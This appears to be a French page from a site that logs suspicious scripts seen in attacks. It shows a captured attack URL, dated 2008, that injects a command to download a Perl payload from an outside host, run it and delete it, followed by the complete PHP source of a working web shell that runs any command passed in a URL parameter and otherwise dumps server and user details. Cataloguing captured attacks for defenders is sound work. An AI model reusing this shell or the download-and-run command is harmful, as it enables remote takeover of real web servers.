Script potentiellement dangereux sur needforthings-com
IP de provenance : 200.192.228.245
Date de connexion : 28-03-2008 10:30:20
Site : http://needforthings.com/click4tshirts/oneadmin/comdev/cmd2.txt?&cmd=cd%20/tmp;wget%20
http://needforthings.com/click4tshirts/oneadmin/eccatalog/wce.read.txt;perl%20wce.read.txt
;rm%20-rf%20wce.read.txt
Retour liste scripts
<!-- cmd.txt.2 with stderr-trapping for multiple plataforms - by Havenard
-->
<table border="0" cellpadding="10" style="border: 1px solid black"
width="100%" bgcolor="silver">
<tr>
<td nowrap align="left"
width="100%" style="font-size: 8px; text-decoration: none; color:
black"><pre><font face="fixedsys"><?php
$safe_mode =
(bool)ini_get("safe_mode");
if (!$safe_mode) {
@ $cmd = $_GET["cmd"];
@ $chdir = $_GET["chdir"];
$cmd = stripslashes($cmd);
$chdir =
stripslashes($chdir);
if (!empty($cmd)) {
if (isset($chdir))
@chdir($chdir);
ob_start();
if (!isset($OS) || ($OS != "Windows_NT"))
@passthru("$cmd 2>&1");
else
@passthru("$cmd");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output))
echo str_replace(">", ">", str_replace("<", "<", $output));
}
else
echo "No command to execute.";
}
else {
echo "Due to SafeMode,
it's unable to execute commands!\n";
echo "Machine informations:\n";
echo "PHP: ".phpversion()."\n";
echo "Server: $SERVER_SOFTWARE
$SERVER_VERSION\n";
$uname = @posix_uname();
if (!empty($uname)) {
while (list($info, $value) = each($uname))
echo "$value ";
echo
"\n";
}
$uids = @posix_getlogin();
$euids = @posix_getlogin();
$uid = @posix_getuid();
$euid = @posix_geteuid();
$gid = @posix_getgid();
if (!empty($uid))
echo "User: uid=$uids($uid) euid=$euid($euid)
gid=$gid($gid)\n";
}
?></font></pre>
</td>
</tr>
</table>
<?
die(); ?>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_sitepage =
'homepages.br/usuarios';
OAS_Page_Positions='TopRight,x01';
OAS_query =
'';
//-->
</SCRIPT>
<SC
[...]
Retour liste scripts
Crédits vignettes :
Thumbzor